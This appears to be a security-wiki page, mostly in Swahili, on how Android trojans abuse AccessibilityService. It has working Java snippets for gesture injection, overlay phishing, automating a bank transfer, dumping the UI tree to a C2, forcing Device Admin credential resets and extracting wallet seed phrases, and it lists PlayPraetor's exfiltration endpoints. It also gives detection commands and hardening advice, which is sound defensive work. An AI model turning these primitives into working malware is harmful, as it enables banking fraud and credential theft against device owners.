Android Accessibility Service Abuse

Reading time: 8 minutes

Muhtasari

AccessibilityService iliumbwa kusaidia watumiaji wenye ulemavu kuingiliana na vifaa vya Android. Kwa bahati mbaya, ile ile powerful automation APIs (global navigation, text input, gesture dispatch, overlay windows…) zinaweza kutumiwa na malware kupata complete remote control ya kifaa without root privileges.

Trojans za kisasa za benki za Android na Remote-Access-Trojans (RATs) kama PlayPraetor, SpyNote, BrasDex, SOVA, ToxicPanda na zingine nyingi hufuata taratibu zile zile:

1. Social-engineer mwathirika ili aweze kuwasha rogue accessibility service (uruhusa BIND_ACCESSIBILITY_SERVICE unachukuliwa kuwa "high-risk" na unahitaji hatua ya wazi ya mtumiaji).
2. Tumia service hiyo ili

• capture kila tukio la UI na maandishi yanayoonekana kwenye skrini,
• inject synthetic gestures (dispatchGesture) na global actions (performGlobalAction) ili ku-automate kazi yoyote inayotaka operator,
• draw full-screen overlays juu ya apps halali kwa kutumia window type TYPE_ACCESSIBILITY_OVERLAY (hakuna sehemu ya SYSTEM_ALERT_WINDOW inayoonekana!),
• silently grant ruhusa za runtime za ziada kwa kubofya dialog za mfumo kwa niaba ya mwathirika.

3. Exfiltrate data au kufanya On-Device-Fraud (ODF) kwa wakati halisi huku mtumiaji akiangalia skrini inayonekana kawaida kabisa.

Kuomba ruhusa

<!-- AndroidManifest.xml -->
<service
android:name="com.evil.rat.EvilService"
android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
android:exported="false">

<intent-filter>
<action android:name="android.accessibilityservice.AccessibilityService" />
</intent-filter>

<meta-data android:name="android.accessibilityservice"
android:resource="@xml/evil_accessibility_config"/>
</service>

XML ya mwenzake inaelezea jinsi dirisha la mazungumzo la bandia litakavyoonekana:

<?xml version="1.0" encoding="utf-8"?>
<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
android:description="@string/service_description"
android:accessibilityEventTypes="typeAllMask"
android:accessibilityFeedbackType="feedbackGeneric"
android:notificationTimeout="200"
android:canPerformGestures="true"
android:canRetrieveWindowContent="true"/>

Misingi ya uendeshaji otomatiki wa UI kwa mbali

public class EvilService extends AccessibilityService {
@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
// harvest text or detect foreground app change
}

// Simulate HOME / BACK / RECENTS …
private void navHome()     { performGlobalAction(GLOBAL_ACTION_HOME); }
private void navBack()     { performGlobalAction(GLOBAL_ACTION_BACK); }
private void openRecents() { performGlobalAction(GLOBAL_ACTION_RECENTS); }

// Generic tap / swipe
public void tap(float x, float y) {
Path p = new Path(); p.moveTo(x, y);
GestureDescription.StrokeDescription s = new GestureDescription.StrokeDescription(p, 0, 50);
dispatchGesture(new GestureDescription.Builder().addStroke(s).build(), null, null);
}
}

Kwa kutumia API hizi mbili tu mshambuliaji anaweza:

• Fungua skrini, fungua app ya benki, pita kupitia UI tree yake na tuma fomu ya uhamisho.
• Kubali kila dialogi ya ruhusa inayojitokeza.
• Sakinisha/sasisha APK za ziada kupitia Play Store intent.

Mifano ya matumizi mabaya

1. Overlay Phishing (Credential Harvesting)

A transparent or opaque WebView is added to the window manager:

WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
TYPE_ACCESSIBILITY_OVERLAY,                      // ⬅ bypasses SYSTEM_ALERT_WINDOW
FLAG_NOT_FOCUSABLE | FLAG_NOT_TOUCH_MODAL,       // touches still reach the real app
PixelFormat.TRANSLUCENT);
wm.addView(phishingView, lp);

The victim types credentials into the fake form while the background app receives the same gestures – no suspicious "draw over other apps" prompt is ever shown.

Detailed example: the Accessibility Overlay Phishing section inside the Tapjacking page.

2. On-Device Fraud automation

Malware families such as PlayPraetor maintain a persistent WebSocket channel where the operator can issue high-level commands (init, update, alert_arr, report_list, …). The service translates those commands into the low-level gestures above, achieving real-time unauthorized transactions that easily bypass multi-factor-authentication tied to that very device.

3. Screen streaming & monitoring

By combining the MediaProjection API with an RTMP client library, the RAT can broadcast the live framebuffer to rtmp://<c2>:1935/live/<device_id>, giving the adversary perfect situational awareness while the Accessibility engine drives the UI.

PlayPraetor – command & control workflow

1. HTTP(S) heartbeat – iterate over a hard-coded list until one domain answers POST /app/searchPackageName with the active C2.
2. WebSocket (port 8282) – bidirectional JSON commands:

• update – push new conf/APKs
• alert_arr – configure overlay templates
• report_list – send list of targeted package names
• heartbeat_web – keep-alive

3. RTMP (port 1935) – live screen/video streaming.
4. REST exfiltration –

• /app/saveDevice (fingerprint)
• /app/saveContacts | /app/saveSms | /app/uploadImageBase64
• /app/saveCardPwd (bank creds)

The AccessibilityService is the local engine that turns those cloud commands into physical interactions.

Detecting malicious accessibility services

• adb shell settings get secure enabled_accessibility_services
• Settings → Accessibility → Downloaded services – angalia programu ambazo sio kutoka Google Play.
• MDM / EMM solutions can enforce ACCESSIBILITY_ENFORCEMENT_DEFAULT_DENY (Android 13+) to block sideloaded services.
• Analyse running services:

adb shell dumpsys accessibility | grep "Accessibility Service"

Hardening recommendations for app developers

• Mark sensitive views with android:accessibilityDataSensitive="accessibilityDataPrivateYes" (API 34+).
• Combine setFilterTouchesWhenObscured(true) with FLAG_SECURE to prevent tap/overlay hijacking.
• Detect overlays by polling WindowManager.getDefaultDisplay().getFlags() or the ViewRootImpl API.
• Refuse to operate when Settings.canDrawOverlays() or a non-trusted Accessibility service is active.

ATS automation cheat-sheet (Accessibility-driven)

Malware can fully automate a bank app with only Accessibility APIs. Generic primitives:

// Helpers inside your AccessibilityService
private List<AccessibilityNodeInfo> byText(String t){
AccessibilityNodeInfo r = getRootInActiveWindow();
return r == null ? Collections.emptyList() : r.findAccessibilityNodeInfosByText(t);
}
private boolean clickText(String t){
for (AccessibilityNodeInfo n: byText(t)){
if (n.isClickable()) return n.performAction(ACTION_CLICK);
AccessibilityNodeInfo p = n.getParent();
if (p != null) return p.performAction(ACTION_CLICK);
}
return false;
}
private void inputText(AccessibilityNodeInfo field, String text){
Bundle b = new Bundle(); b.putCharSequence(ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
field.performAction(ACTION_SET_TEXT, b);
}
private void tap(float x, float y){
Path p = new Path(); p.moveTo(x,y);
dispatchGesture(new GestureDescription.Builder()
.addStroke(new GestureDescription.StrokeDescription(p,0,40)).build(), null, null);
}

Mfano wa mtiririko (Czech → English labels):

• "Nová platba" (Malipo mapya) → bonyeza
• "Zadat platbu" (Weka malipo) → bonyeza
• "Nový příjemce" (Mpokeaji mpya) → bonyeza
• "Domácí číslo účtu" (Nambari ya akaunti ya ndani) → zingatia and ACTION_SET_TEXT
• "Další" (Ifuatayo) → bonyeza → … "Zaplatit" (Lipa) → bonyeza → ingiza PIN

Mbinu ya dharura: kuratibu zilizowekwa (hard-coded) kwa dispatchGesture wakati utafutaji wa maandishi unashindwa kutokana na widgets maalum.

Imeonekana pia: hatua za awali za check_limit na limit kwa kuvinjari kiolesura cha mipaka na kuongeza mipaka ya kila siku kabla ya uhamisho.

Utoaji wa skrini bandia unaotegemea maandishi

Kwa udhibiti wa mbali wenye latency ndogo, badala ya mtiririko kamili wa video, tengeneza uwakilishi wa maandishi wa mti wa UI wa sasa na uitume kwa C2 kwa mfululizo.

private void dumpTree(AccessibilityNodeInfo n, String indent, StringBuilder sb){
if (n==null) return;
Rect b = new Rect(); n.getBoundsInScreen(b);
CharSequence txt = n.getText(); CharSequence cls = n.getClassName();
sb.append(indent).append("[").append(cls).append("] ")
.append(txt==null?"":txt).append(" ")
.append(b.toShortString()).append("\n");
for (int i=0;i<n.getChildCount();i++) dumpTree(n.getChild(i), indent+"  ", sb);
}

Hii ni msingi wa amri kama txt_screen (za mara moja) na screen_live (zinazoendelea).

Misingi ya kulazimisha Device Admin

Mara tu Device Admin receiver inapowezeshwa, miito hii inaongeza fursa za kunasa credentials na kudumisha udhibiti:

DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(DEVICE_POLICY_SERVICE);
ComponentName admin = new ComponentName(this, AdminReceiver.class);

// 1) Immediate lock
dpm.lockNow();

// 2) Force credential change (expire current PIN/password)
dpm.setPasswordExpirationTimeout(admin, 1L); // may require owner/profile-owner on recent Android

// 3) Disable biometric unlock to force PIN/pattern entry
int flags = DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS;
dpm.setKeyguardDisabledFeatures(admin, flags);

Kumbuka: upatikanaji halisi wa sera hizi hutofautiana kulingana na toleo la Android na OEM; thibitisha device policy role (admin vs owner) wakati wa upimaji.

Mifumo ya uchimbaji wa seed-phrase za pochi za Crypto

Mtiririko uliobainika kwa MetaMask, Trust Wallet, Blockchain.com na Phantom:

• Fungua kwa kutumia PIN iliyodukuliwa (iliyorekodiwa kupitia overlay/Accessibility) au nenosiri la pochi lililotolewa.
• Sogelea: Settings → Security/Recovery → Reveal/Show recovery phrase.
• Chukua phrase kupitia keylogging ya text nodes, secure-screen bypass, au screenshot OCR wakati maandishi yamefichika.
• Saidia maeneo mengi (EN/RU/CZ/SK) ili kusawazisha selectors – pendelea viewIdResourceName inapopatikana, vinginevyo tumia ulinganishaji wa maandishi wa lugha nyingi.

Uendeshaji wa NFC-relay

Moduli za Accessibility/RAT zinaweza kusakinisha na kuanzisha app maalum ya NFC-relay (e.g., NFSkate) kama hatua ya tatu na hata kuingiza mwongozo wa overlay ili kumuelekeza mwathirika kupitia hatua za relay za kadi zilizopo.

Historia na TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay

Marejeo

• PlayPraetor’s evolving threat: How Chinese-speaking actors globally scale an Android RAT
• Android accessibility documentation – Automating UI interaction
• The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)
• GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)